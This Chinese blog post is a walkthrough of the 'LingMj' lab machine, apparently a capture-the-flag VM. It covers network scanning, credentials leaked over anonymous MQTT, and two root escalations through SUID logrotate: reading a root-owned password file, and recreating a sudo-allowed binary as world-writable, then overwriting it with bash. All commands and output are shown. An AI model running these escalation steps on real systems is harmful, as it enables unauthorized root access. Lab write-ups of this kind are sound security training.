Pepster'Blog
Temp-Lingmj-Walkthrough
城南花已开 Lv6
  2025-04-26 20:48:15   2025-05-12 01:27:09  1.7k 字  9 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.161        08:00:27:49:53:be       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e5:17       VMware, Inc.

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.122 seconds (120.64 hosts/sec). 4 responded
export ip=192.168.60.161
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.161:22
Open 192.168.60.161:80
Open 192.168.60.161:1883
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 13:48 CST
Initiating ARP Ping Scan at 13:48
Scanning 192.168.60.161 [1 port]
Completed ARP Ping Scan at 13:48, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:48
Completed Parallel DNS resolution of 1 host. at 13:48, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:48
Scanning 192.168.60.161 [3 ports]
Discovered open port 22/tcp on 192.168.60.161
Discovered open port 1883/tcp on 192.168.60.161
Discovered open port 80/tcp on 192.168.60.161
Completed SYN Stealth Scan at 13:48, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.161
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-04-27 13:48:08 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
1883/tcp open  mqtt    syn-ack ttl 64
MAC Address: 08:00:27:49:53:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

得知1883mqtt协议端口开放

尝试利用mqttx客户端软件匿名连接一下,不加用户名和密码

image

添加订阅Topic为全部即为#

发现会定期发送一段base64密文

image

尝试解码,得到welcome的凭证

1
2
echo "d2VsY29tZTpmOGM1N2RmYzU4MGVhODk0YTI1M2E2ZTE2ZjMwYWMyMQ=="|base64 -d
welcome:f8c57dfc580ea894a253a6e16f30ac21

用户提权

ssh连接一下

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ ssh welcome@$ip
[email protected]'s password:
Linux LingMj 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 26 20:25:47 2025 from 192.168.60.100
welcome@LingMj:~$ cat user.txt
flag{user-userflaghere}

可以发现存在sudo权限可以执行ash

不过这只是一个陷阱,给你伪造一个root中shell的假象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
welcome@LingMj:~$ sudo -l
Matching Defaults entries for welcome on LingMj:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on LingMj:
    (ALL) NOPASSWD: /usr/bin/ash
welcome@LingMj:~$ strings /usr/bin/ash
/lib64/ld-linux-x86-64.so.2
mh OG
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
readline
rl_completion_matches
rl_attempted_completion_over
rl_attempted_completion_function
rl_outstream
using_history
add_history
strncmp
puts
putchar
strdup
strlen
stderr
__cxa_finalize
strcmp
__libc_start_main
free
libreadline.so.8
libc.so.6
GLIBC_2.2.5
u/UH
[]A\A]A^A_
whoami
uid=0(root) gid=0(root) groups=0(root)
root.txt
cat root.txt
root
This is the great ta0 privilege escalation!
root@LingMj:~#
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
fake.c
list_index.1
len.0
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
rl_outstream
free@GLIBC_2.2.5
putchar@GLIBC_2.2.5
strncmp@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
rl_attempted_completion_function
rl_completion_matches
add_history
_edata
strlen@GLIBC_2.2.5
readline
__libc_start_main@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
custom_completion
command_list
using_history
__libc_csu_init
rl_attempted_completion_over
__bss_start
main
execute_command
__TMC_END__
_ITM_registerTMCloneTable
strdup@GLIBC_2.2.5
command_generator
__cxa_finalize@GLIBC_2.2.5
stderr@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

查找可疑的SUID权限程序

发现screen logrotate这两个程序都拥有SUID权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
welcome@LingMj:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/logrotate
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

logrotate 旨在简化对生成大量日志文件的系统的管理。它允许自动旋转、压缩、删除和邮寄日志文件。每个日志文件可以每天、每周、每月或变得太大时处理。

screen 是一个 终端复用工具(Terminal Multiplexer),用于在单个终端窗口中管理多个虚拟终端会话。它特别适合在远程服务器上执行长时间任务,或在断开 SSH 连接后仍能保持进程运行。

查看screen版本

1
2
welcome@LingMj:/tmp$ screen -version
Screen version 4.09.00 (GNU) 30-Jan-22

GNU screen v4.9.0 - Privilege Escalation - Linux local Exploit

我还想着版本正好符合利用条件,尝试后无果

换个方向,logrotate可以在网上搜到相关的漏洞利用,通过条件竞争

Linux 权限提升 - HackTricks

logrotate 争用条件的详细信息 |汇源科技

whotwagner/logrotten

尝试利用一下,然而并不行

image

Method 1

不过我发现logrotate可以读文件,不过只能读开头一点

可以在/var/bakcup下发现有个备份文件,隶属于root用户

尝试读一下,得到内容naughtykid

1
2
3
4
5
6
7
welcome@LingMj:~$ /usr/sbin/logrotate -d /var/backups/root.bak
WARNING: logrotate in debug mode does nothing except printing debug messages!  Consider using verbose mode (-v) instead if this is not what you want.

reading config file /var/backups/root.bak
error: /var/backups/root.bak:1 unknown option 'naughtykid' -- ignoring line
Reading state from file: /var/lib/logrotate/status
Allocating hash table for state file, size 64 entries

尝试切换一下用户

1
2
3
4
5
6
welcome@LingMj:~$ su root
Password:
root@LingMj:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
root@LingMj:/home/welcome# cat /root/root.txt
flag{root-rootflagalsohere}

Method 2

你可以利用logrotate来生成属于root用户的文件

1
2
3
4
5
6
7
8
9
10
welcome@LingMj:/tmp$ echo "This is a test log line" > /tmp/111.log
welcome@LingMj:/tmp$ for i in {1..1000}; do echo "Log entry $i" >> /tmp/111.log; done
welcome@LingMj:/tmp$ cat logrotate.conf
/tmp/111.log {
    size 1k
    rotate 2
    create 0777 root root
    missingok
    notifempty
}

执行后可以发现111.log权限是777

1
2
3
4
5
6
7
welcome@LingMj:/tmp$ /usr/sbin/logrotate -f logrotate.conf
welcome@LingMj:/tmp$ ls -al
total 60
drwxrwxrwt 10 root    root     4096 Apr 27 06:19 .
drwxr-xr-x 18 root    root     4096 Mar 18 20:37 ..
-rwxrwxrwx  1 root    root        0 Apr 27 06:19 111.log
-rw-r--r--  1 welcome welcome 13917 Apr 27 06:19 111.log.1

所以我们可以将usr/bin/ash权限改为777

然后将正常的/bin/bash写到/usr/bin/ash

修改配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
welcome@LingMj:/tmp$ vi logrotate.conf
/usr/bin/ash {
    size 1k
    rotate 2
    create 0777 root root
    missingok
    notifempty
}
welcome@LingMj:/tmp$ /usr/sbin/logrotate -f logrotate.conf
welcome@LingMj:/tmp$ ls -al /usr/bin/ash*
-rwxrwxrwx 1 root root     0 Apr 27 06:23 /usr/bin/ash
-rwxr-xr-x 1 root root 17592 Apr 26 00:28 /usr/bin/ash.1
welcome@LingMj:/tmp$ cat /bin/bash > /usr/bin/ash
welcome@LingMj:/tmp$ ls -al /usr/bin/ash
-rwxrwxrwx 1 root root 1168776 Apr 27 06:24 /usr/bin/ash
welcome@LingMj:/tmp$ sudo /usr/bin/ash
root@LingMj:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@LingMj:/tmp# cat /root/root.txt
flag{root-rootflagalsohere}
  1. 信息收集
    1. 服务探测
  2. 用户提权
    1. Method 1
    2. Method 2
总字数 546.8k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
  2. 用户提权
    1. Method 1
    2. Method 2